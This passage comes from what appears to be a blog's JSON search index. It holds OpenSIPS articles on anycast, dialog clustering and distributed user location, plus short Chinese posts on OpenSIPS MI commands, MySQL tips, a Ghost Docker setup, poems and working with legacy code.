from the clients side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually using the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP).","title":"Full Anycast support in OpenSIPS 2.4"},{"content":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support? In this article we are going to look into the limitations of distributing ongoing calls in previous OpenSIPS versions and how we overcame them and added new possibilities in 2.4, based on the improved clustering engine.\nPrevious Limitations Up until this point, distributing ongoing dialogs essentially only consisted in sharing the relevant internal information with all other OpenSIPS instances in the cluster. To optimize the communication, whenever a new dialog is created (and confirmed) or on existing one is updated (state changes etc.), a binary message about that particular dialog is broadcasted.Limiting the data exchange to be driven by runtime events leaves an instance with no way of learning all the dialog information from the cluster when it boots up or at a particular moment in time. Consider what happens when we restart a backup OpenSIPS: any failover that we hope to be able to handle on that node will have to be delayed until it gets naturally in sync with the other node(s).But the more painful repercussion of just sharing data without any other distributed logic is the lack of a mechanism to coordinate certain data-related actions between the cluster nodes. For example, in a typical High-Availability setup with an active-passive nodes configuration, although all dialogs are duplicated to the passive node, the following must be performed exactly once:\ngenerate **BYE requests **and/or produce CDRs (Call Detail Records) upon dialog expiration; send Re-Invite or OPTIONS pings to end-points; send replication packets on dialog events; update the dialog database (if it is still used as a failsafe for binary replication, e.g. both nodes crash). Usage scenarios Before actually diving into how OpenSIPS 2.4 solves the before mentioned issues, let’s first see the most popular scenarios we considered when designing the dialog clustering support:\nActive – Backup setup for High Availability using Virtual IPs**.** The idea here would be to have a Virtual IP (or floating IP) facing the end-users. This IP will be automatically moved from a failed instance to a hot-backup server by tools like vrrpd, KeepaliveD, Heartbeat. Active – Active setup, or a double cross Active-Backup. This is a more “creative” approach using two Virtual IPs, each server being active for one of them and backup for the other, and still sharing all the dialogs, in order to handle both VIPs when a server fails. Anycast setup for Distributed calls (High Availability and Balancing). This relies on the newly add full support for Anycast** **introduced in OpenSIPS 2.4. You can find more details in the dedicated article. Dialog Clustering with OpenSIPS 2.4 The new dialog clustering support in OpenSIPS 2.4 is addressing all the mentioned limitations by properly and fully addressing the typical clustering scenarios. But first let’s see which are the newly introduced concepts in OpenSIPS 2.4 when it comes to clustering dialogs.\nData synchronization In order to address our first discussed issue, the improved clustering under-layer in OpenSIPS 2.4 offers the capability of synchronizing a freshly booted node with the complete data set from the cluster in a fast and transparent manner. This way, we can minimize the impact of restarting an OpenSIPS instance, or plugging a new node in the cluster on the fly, without needing any DB storage or having to accept the compromise of lost dialogs. We can also perform a sync at any time via an MI command, if for some reason the dialog data got desynchronized on a given instance.\nDialog ownership mechanism The other big improvement that OpenSIPS 2.4 introduces for distributing dialogs is the capability to precisely decide which node in the cluster is responsible for a dialog – responsible in the way of triggering certain actions for that dialog. This comes as a necessity because some of the dialogs are locally created on an instance, some are temporarily handled in place of a failed/inactive node and others are just kept as backup. As such, the concept of dialog “ownership” was introduced.The basic idea of this mechanism is that a single node in the dialog cluster (where all the calls are shared) is “responsible” at any time of a given dialog, in terms of taking actions for it. When the node owning the dialog goes down, another node become its owner and handle its actions.But how is this ownership concept concretely implemented in OpenSIPS 2.4?\nSharing tags In order to be able to establish an ownership relationship between the nodes and the dialog, we introduced the concept of tags or _“sharing tags” _as we call them. Each dialog is marked with a single tag; on the other hand, a node is actively responsible for (owning) a tag (and indirectly all the dialogs marked with that tag). A tag may be present on several nodes, but only a single node sees the tag as active; the other nodes aware of that tag are seeing the tag in standby/backup mode.So each node may be aware of multiple sharing tags, each with an _active _or backup state. Each tag can be defined with an implicit state at OpenSIPS startup or directly set at runtime and all this information is shared between the cluster nodes. When we set a sharing tag to active on certain node, we are practically setting that node to become the owner of all its known dialogs that are marked with that particular tag. At the same time, if another node was active for tag, it has to step down.To better understand this, we will briefly describe how the sharing tags should be used in the previously mentioned scenarios, considering a simple two node cluster:\nin an active-backup cluster with a single VIP, we would only need a single sharing tag corresponding the VIP address; the node that holds the VIP will also have the VIP set to active and perform all the dialog related actions; in an active-active cluster with two VIPs, we would need two sharing tags, corresponding to each VIP, and whichever node holds the given VIP, should have the appropriate tag set as active; in an anycast cluster setup, we will have one sharing tag corresponding to each node (because the dialog is tied to the node it was first created as opposed to an IP). If a node is up, it should have its corresponding tag active, otherwise any node can take the tag over. Configuration Setting up dialog replication in OpenSIPS 2.4 is very easy and, in the following, we will exemplify our discussed scenarios with the essential configuration:\n1. Active-backup setup Let’s use the tag named “vip” which will be configured via the dlg_sharing_tag module parameter. When starting OpenSIPS, you need to check the HA status of the node (by inspecting the HA system) and to decide which node will start as owner of the tag:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=active\u0026rdquo;)if active or :modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=backup\u0026rdquo;)if standby.During runtime, depending on the change of the HA system, the tag may be moved (as active) to a different node by using MI commands (see following chapter).At script level, all we need to do, on each node, is to mark a newly created dialog with the sharing tag, using the set_dlg_sharing_tag() function:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;vip\u0026rdquo;);}\n2. Active-active setup Similar with the previous case, but we will use two tags, one for each VIP address. We will define the initial tag state for the first VIP, on the first node:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip1=active\u0026rdquo;)The second node will initially be responsible for the second VIP, so on node id 2 we will set:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip2=active\u0026rdquo;)Now, on each node, depending on which VIP do we receive the initial Invite, we mark the dialog appropriately:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); if ($Ri == 10.0.0.1 # VIP 1) set_dlg_sharing_tag(\u0026ldquo;vip1\u0026rdquo;); else if ($Ri == 10.0.0.2 # VIP 2) set_dlg_sharing_tag(\u0026ldquo;vip2\u0026rdquo;);}So, calls established via the VIP1 address will be marked with the “vip1” tag and handled by the node having the “vip1” tag as active – this will be the node 1 in normal operation.The calls established via the VIP2 address will be marked with the “vip2” tag and handled by the node having the “vip2” tag as active – this will be the node 2 in normal operation.If the node 1 fails, the HA system will move the VIP1 as active on node 2. Further, the HA system is responsible to instruct OpenSIPS running on node 2 that it become the owner of tag “vip1” also, so node 2 will start to actively handle the calls marked with “vip1” also.\n3. Anycast setup Each node has its own corresponding tag and it starts with the tag as active. So on node 1 we will have:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;node_1=active\u0026rdquo;)And on the second node, the same as above, but with “node_2=active”.Now, each node marks the dialogs with its own tag, for example on node 1:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;node_1\u0026rdquo;);}And, conversely, node 2 marks each created dialog with the “node_2” tag.If node 1 fails, the monitoring system (also responsible for the Anycast management and BGP updates) will pick one of the remaining node in the anycast group and it will activate the “node_1” tag on it. So, this new node will became owner and responsible for the calls created on former node 1.\nChanging sharing tags state All that remains to be discussed is how can we take over the ownership of the dialogs flagged with a certain sharing tag at runtime. This is of course the case when our chosen mechanism of node availability detects that a node in the cluster is down, or when we do a manual switch-over (e.g. for maintenance). So for this purpose, all we have to do is to issue the MI command dlg_set_sharing_tag_active that sets a certain sharing tag to the active state. For example, in the single VIP scenario, with a sharing tag named “vip”, after we have re-pointed the floating IP to the current machine, we would run:opensipsctl fifo dlg_set_sharing_tag_active vip\nConclusions The new dialog clustering support in OpenSIPS 2.4 is a complete one as it not only takes care of dialog replication/sharing, but also of dialog handling in terms of properly triggering dialog-specific actions.The implementation also tries to provide a consistent solution, by following and addressing the most used scenarios in terms of dialog clustering – these are real world scenarios answering to real world needs.Even more, the work on the dialog clustering was consistently correlated with work on the Anycast support, so it will be an easy task for the user to build an integrated anycast setup taking care of both transaction and dialog layers.Need more practical examples ? Join us to the OpenSIPS Summit 2018 in Amsterdam and see the Interactive Demos about the clustering support in OpenSIPS 2.4\n","permalink":"https://wdd.js.org/opensips/blog/cluster-call/","summary":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support?","title":"Clustering ongoing calls with OpenSIPS 2.4"},{"content":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes. From a data sharing point of view, we can break the distributed user location support down in two major modes of usage:\n“federation”, where each node holds a portion of the overall dataset. You can read everything about this data sharing strategy in this tutorial. “full sharing”, where all cluster nodes are homogeneous and interchangeable. In this article, we’re going to zoom in on the “full sharing” support, which is actually further broken down into two submodes of usage, depending on the size of your deployment: one where the dataset fits into OpenSIPS memory, and the other one where it is fully managed by a specialized NoSQL database.\nNative “Full Sharing” With native (OpenSIPS-only) data sharing, we make use of the clustering layer in order to replicate SIP AoRs and Contacts between nodes at runtime, as well as during the startup synchronization phase. An example setup would look like the following:\nNative “Full Sharing” ArchitectureNotice how the OpenSIPS cluster is front-ended by an additional SIP entity: a Session Border Controller. This is an essential requirement of this topology (and a common gotcha!). The idea is that the nodes, along with the way they use the data must be identical. This allows, for example, the ability to ramp up/down the number of instances when the platform is running at peak hour or is sitting idle.Let’s take a look at some common platform management concerns and see how they are dealt with using the native “full sharing” topology.\nDealing with Node Failures Node failures in “full sharing” topologies are handled smoothly. Thanks to the SBC front-end that alleviates all IP restrictions, the service can withstand downtime from one or more cluster nodes without actually impacting the clients at all.\nSuccessfully completing a call through Node 2 after Node 1 goes offlineIn this diagram, cluster Node 1 goes offline due to a hardware failure. After the SIP INVITE transaction towards Node 1 times out, the SBC fails over to Node 2, successfully completing the call.\nRestart Persistency By having restart persistency, we ensure that we are able to restart a node without losing the cached dataset. The are two ways of achieving this, depending on whether you intend to use an SQL database or not.\nCluster Sync The clustering layer can also act as an initialization tool, allowing a newly booted “joiner” node to discover a consistent “donor” node from which to request a full data sync.\nSQL-based Users who prefer a more sturdy, disk-driven way of persisting data can easily configure an SQL database URL to which an OpenSIPS node will periodically flush its cached user location dataset.Recommendation: if you plan on using this feature, we recommend deploying a local database server on each node. Setting up multiple nodes to flush to a shared database using the old skip_replicated_db_ops feature may still work, but we no longer encourage or test such setups.\nContact Pinging Thanks to the clustering layer that makes nodes aware of the total number of online nodes, we are able to evenly spread the pinging workload across the current number of online cluster nodes at any given point in time.Configuration: You only have to configure the pinging-related module parameters of nathelper(e.g. sipping_bflag, sipping_from, natping_tcp, natping_interval) and set these flags for the contacts which require pinging. Nothing new, in short. The newly added pinging workload distribution logic will work right out of the box.\n“Full Sharing” via NoSQL NoSQL-based “Full Sharing”For deployments that are so large that the dataset outgrows the size of the OpenSIPS cache, or in case you simply don’t feel at ease with Gigabytes worth of cached SIP contacts in production, NoSQL may be a more pleasant alternative.With features such as data replication, data sharding and indexed columns, it may be a wise choice to leave the handling of large amounts of data to a specialized engine rather than doing it in-house. Configuring such setups will be a topic for an in-depth future tutorial, where we will learn how to configure “full sharing” user location clusters with both of the currently supported NoSQL engines: Apache Cassandra and MongoDB.\nSummary The “full sharing” data distribution strategy for the OpenSIPS user location is an intuitive solution which requires little to no additional OpenSIPS scripting (only a handful of module parameters). The major hurdles of running a SIP deployment (data redundancy, node failover, restart persistency and NAT traversal) have been carefully solved and baked into the module, without imposing any special script handling to the user. Moreover, depending on the sizing requirements of the target platform, users retain the flexibility of choosing between the native or NoSQL-based data management engines.\n","permalink":"https://wdd.js.org/opensips/blog/cluster-location/","summary":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. The aim of this extension of the OpenSIPS usrloc module is to provide a horizontally scalable solution that is easy to set up and maintain, while remaining flexible enough to cope with varying needs of each specific deployment.Throughout this text, by “data” we refer to SIP Addresses-of-Record (subscribers) and their dynamic SIP Contact bindings (network coordinates of their SIP devices) — all of these must be replicated across cluster nodes.","title":"Clustered SIP User Location: The Full Sharing Topology"},{"content":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0 .For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the **_devops _**concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor. Nevertheless, how easy to use and operate the software is, it;s a another factor with almost the same importance . Especially if we consider the case of OpenSIPS which is a very complex software to configure, to integrate and to operate in large scale multi-party platforms.\nThe “dev” aspects in OpenSIPS 3.0 This release is looking to improve the experience of the OpenSIPS script writer (developer), by enhancing and simplifying the OpenSIPS script, at all its level.The script re-formatting (as structure), the addition of full pre-processor support, the enhancement of the script variable’s naming and support, the standardization of the complex modparams (and many other) will address the script writers needs of\neasiness flexibility strength when comes to creating, managing and maintaining more and more complex OpenSIPS configurations.The full list of “dev” oriented features along with explanations and details is to be found on the official 3.0 planning document.\nThe “ops” aspects in OpenSIPS 3.0 The operational activity is a continues job, starting from day one, when you started to run your OpenSIPS. Usually there is a lot of time, effort and resources invested in this operational activities, so any extra help in the area is more than welcome.OpenSIPS 3.0 is planning several enhancements and new concepts in order to help with operating OpenSIPS – making it simpler to run, to monitor, to troubleshoot and diagnose.We are especially looking at reducing the need of restarts during service time – restarting your production OpenSIPS is something that any devops engineer will try to avoid as much as possible. New features as auto-scaling (as number of processes), runtime changes of module parameters or script reload are addressing this fear. Even when a restart cannot be avoided, the internal memory persistence during restart may minimize the impact.But when comes to vital operational activities like monitoring and understanding what is going one with your OpenSIPS or troubleshooting calls or traffic handled by your OpenSIPS, the most important new additions for helping to operate OpenSIPS are:\ntracing console – provided by the new ‘opensipsctl’ tool, the console will allow you to see in realtime various information related to specifics call only. The information may be the OpenSIPS logs, SIP packets, script logs, rest queries, maybe DB queries self diagnosis tool – also provided by the opensipsctl tool, this is a logic that collects various information from a running OpenSIPS (via MI) in regards to thresholds, load information, statistics and logs in order to locate and indicate a potential problem or bottleneck with your OpenSIPS. There are even more features that will simply the way you operate your OpenSIPS – the full list (with explanations) is available on the official 3.0 planning document.\nMore Integration aspects withe OpenSIPS 3.0 The work to make possible the integration of OpenSIPS with other external components is a never-ending job. This release will make no exception and address this need.A major rework of the Management Interface is ongoing, with the sole purpose of standardizing and simplifying the way you interact with the MI interface. Shifting to Json encoding as the only way to pack data and re-structuring all the available transport (protocols) for interacting with the MI interface will enhance your experience in using this interface from any other language / application.The 3.0 release is planning to provide new modules for more integration capabilities:\n**SMPP **module – a bidirectional gateway / translator between SIP (MESSAGE requests) and SMPP protocol. RabbitMQ consumer module – a RabbitMQ consumer that pushes the messages as events into the OpenSIPS script. A more detailed description is available on the official 3.0 planning document.\nCommunity opinion is important The opinion of the community matters to us, so we need your feedback and comments in regards to the 3.0 Dev Plan.To express yourself on the 3.0 Dev Plan, please see the online form — you can give scores to the items in the plan and you can suggest other items. This feedback will be very useful for us in order to align the Dev Plan to the real needs of our community, of the people actually using OpenSIPS. Besides our ideas listed in the form, you can of course come with your own ideas, or feature requests that we will gladly take into considerations.The deadline for submitting your answers in the form is 6th of January 2019. After this deadline we will gather all your submissions and sort them according to your feedback. We will use the result to filter the topics you consider interesting and prioritize the most wanted ones.Also, to talk more in details about the features of this new release, a public audio conferencewill be available on 20th of December 2018, 4 pm GMT , thanks to the kind sponsorship of UberConference. Anyone is welcome to join to find out more details or to ask questions about OpenSIPS 3.0.This is a public and open conference, so no registration is needed.\nThe timeline The timeline for OpenSIPS 3.0 is:\nBeta Release – 18-31 March 2019 Stable Release – 22-29 April 2019 General Availability – 30th of April 2019, during OpenSIPS Summit 2019 ","permalink":"https://wdd.js.org/opensips/blog/opensips3x/","summary":"You already know the story – one more year, one more evolution cycle, one more OpenSIPS major release. Even more, a new OpenSIPS direction is about to start. So let me introduce you to the upcoming OpenSIPS 3.0 .For the upcoming OpenSIPS 3.0 release (and 3.x family) the main focus is on the **_devops _**concept. Shortly said, this translates into:\nmaking the OpenSIPS script writing/developing much easier simplifying the operational activities around OpenSIPS What features and functionalities a software is able to deliver is a very important factor.","title":"Introducing OpenSIPS 3.0"},{"content":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的所搜引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","permalink":"https://wdd.js.org/posts/2019/07/bq7ih4/","summary":"问题分为两种,一种是搜索引擎能够找到答案的,另一种是搜索引擎找不到答案的。\n按照80-20原则,前者估计能占到80%,而后者能占到20%。\n1 搜索引擎的使用 1.1 如何让搜索引擎更加理解你? 如果你能理解搜索引擎,那么搜索引擎会更加理解你。\n搜索引擎是基于关键词去搜索的,所以尽量给搜索引擎关键词,而不是大段的报错 关键词的顺序很重要,把重要的关键词放在靠前的位置 1.2 如何提炼关键词? 1.3 不错的所搜引擎推荐? 2 当搜索引擎无法解决时? 当搜索引擎无法解决时,可以从哪些方面思考?\n拼写或者格式等错误 上下文不理解,语境不清晰,断章取义 ","title":"解决问题的思维模式"},{"content":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢\n","permalink":"https://wdd.js.org/posts/2019/07/icwy4b/","summary":"梦与诗 胡适 醉过才知酒浓爱过才知情重你不能做我的诗正如我不能做你的梦\n情歌 刘半农天上飘着些微云地上吹着些微风啊!微风吹动了我的头发教我如何不想她?\n沙扬娜拉 赠日本女郎 徐志摩最是那一低头的温柔像一朵水莲花不胜凉风的娇羞道一声珍重道一声珍重那一声珍重里有蜜甜的忧愁沙扬娜拉!\n再别康桥 徐志摩轻轻地我走了正如我轻轻地来我轻轻地招手作别西天的云彩\n伊眼底 汪静之伊眼底是温暖的太阳不然,何以伊一望着我我受了冻的心就热了呢","title":"现代诗 五首 摘抄"},{"content":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","permalink":"https://wdd.js.org/posts/2019/07/ae4atc/","summary":"Docker ghost 安装 docker run -d --name myghost -p 8090:2368 -e url=http://172.16.200.228:8090/ \\ -v /root/volumes/ghost:/var/lib/ghost/content ghost 模板修改 参考 https://www.ghostforbeginners.com/move-featured-posts-to-the-top-of-your-blog/ ","title":"ghost博客 固定feature博客"},{"content":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不通。opensipsctl fifo which输出的命令也不通。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","permalink":"https://wdd.js.org/opensips/ch3/core-mi/","summary":"在所有的fifo命令中,which命令比较重要,因为它可以列出所有的其他命令。\n有些mi命令是存在于各个模块之中,所以加载的模块不通。opensipsctl fifo which输出的命令也不通。\n获取执行参数 opensipsctl fifo arg 列出TCP连接数量 opensipsctl fifo list_tcp_conns 查看进程信息 opensipsctl fifo ps 查看opensips运行时长 opensipsctl fifo uptime 查看所有支持的指令 opensipsctl fifo which 获取统计数据 opensipsctl fifo get_statistics rcv_requests 重置统计数据 opensipsctl fifo get_statistics received_replies get_statistics reset_statistics uptime version pwd arg which ps kill debug cache_store cache_fetch cache_remove event_subscribe events_list subscribers_list list_tcp_conns help list_blacklists regex_reload t_uac_dlg t_uac_cancel t_hash t_reply ul_rm ul_rm_contact ul_dump ul_flush ul_add ul_show_contact ul_sync domain_reload domain_dump dlg_list dlg_list_ctx dlg_end_dlg dlg_db_sync dlg_restore_db profile_get_size profile_list_dlgs profile_get_values list_all_profiles nh_enable_ping cr_reload_routes cr_dump_routes cr_replace_host cr_deactivate_host cr_activate_host cr_add_host cr_delete_host dp_reload dp_translate address_reload address_dump subnet_dump allow_uri dr_reload dr_gw_status dr_carrier_status lb_reload lb_resize lb_list lb_status httpd_list_root_path sip_trace rtpengine_enable rtpengine_show rtpengine_reload teardown ","title":"核心MI命令"},{"content":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1\n","permalink":"https://wdd.js.org/posts/2019/07/bk7r40/","summary":"表复制 # 不跨数据库 insert into subscriber_copy(id, username) select id, username from subscriber # 跨数据库 需要在表名前加上数据库名 insert into wdd.test(id, username) select id, username from opensips.subscriber 调整表结构 增加字段 ALTER TABLE test ADD `username` char(64) not null default \u0026#39;\u0026#39; 随机选择一个数据 SELECT name FROM table_name order by rand() limit 1","title":"MySql学习"},{"content":"\n自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}\n","permalink":"https://wdd.js.org/freeswitch/get-sip-header/","summary":"自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}","title":"通道变量与SIP 消息头"},{"content":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓\n","permalink":"https://wdd.js.org/posts/2019/07/fabbky/","summary":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓","title":"无题 再读唐诗宋词"},{"content":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","permalink":"https://wdd.js.org/posts/2019/07/gzfn7t/","summary":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","title":"从千与千寻谈编程风格"},{"content":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。\n","permalink":"https://wdd.js.org/posts/2019/07/osb460/","summary":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 